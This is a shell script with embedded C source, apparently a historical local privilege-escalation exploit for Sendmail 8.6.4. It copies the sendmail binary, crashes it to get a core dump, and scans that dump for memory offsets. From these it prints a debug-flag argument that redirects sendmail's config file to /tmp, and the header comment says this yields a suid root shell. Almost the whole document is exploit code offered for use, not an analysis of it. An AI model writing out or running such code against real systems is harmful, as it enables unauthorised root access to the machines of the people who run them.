# Modified to create a suid root shell in /tmp
# this has been tested on Sendmamil 8.6.4 but
# is assumed to work on other versions. 

# calculate the parameters needed for a given sendmail
# program to change config file from "/etc/sendmail.cf"
# to "/tmp/sendmail.cf"

# location of a readable sendmail program
SENDMAIL=/usr/lib/sendmail

TEMP=/tmp/.ab$$
mkdir $TEMP
cp $SENDMAIL $TEMP/sm
cd $TEMP
chmod 700 ./sm

cat > calc.c << _EOF_

#include <fcntl.h>

gencore()
{
  int pid;
  int fd[2];

  if(pipe(fd) < 0) {
    perror("pipe");
    exit(1);
    return(0);
  }
  pid = fork();
  if(!pid) {
    int f = open("./out", O_RDWR|O_CREAT, 0666);
    dup2(f, 1); dup2(fd[0], 0);
    close(f); close(fd[1]); close(fd[0]);
    execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
    perror("exec");
    exit(0); 
  } else {
    sleep(2);
    kill(pid, 11);
  }
  close(fd[0]);
  close(fd[1]);  
}

main(argc,argv)
char **argv;
int argc;
{
  unsigned int ConfFile,tTdvect,off;
  
  gencore();
  tTdvect = find("ZZZZZZZZ", "core");
  ConfFile = find("/nau/local/lib/mail/aliases", "core");
  if(!tTdvect || !ConfFile) {
    printf("Not found!\n");
    return(0);
  }
  off = ConfFile - tTdvect;
  printf("sendmail -d%u.%d,%u.%d,%u.%d\n", 
               off+1, 't', off+2, 'm', off+3, 'p');
}

int find(pattern, file)
char *pattern,*file;
{
  int fd;
  int i, addr;
  char c;

/*  printf("find %s: ", pattern);  */
  fd = open(file, 0);

/*  assume file exists
  if(fd < 0) {
    printf("file %s not found\n", file);
    return(0);
  }
*/
  i = 0;
  addr = 0;
  while(read(fd, &c, 1) == 1) {
    if(pattern[i] == c)
      i++;
    else
      i=0;
    if(pattern[i] == '\0') {
      addr -= strlen(pattern);
      printf("%x (%d)\n", addr, addr);
      return(addr);
    }
    addr++;
  }
  printf("Not Found!\n");
  return(0);
}
_EOF_

cc calc.c -o calc
./calc
cd
rm -rf $TEMP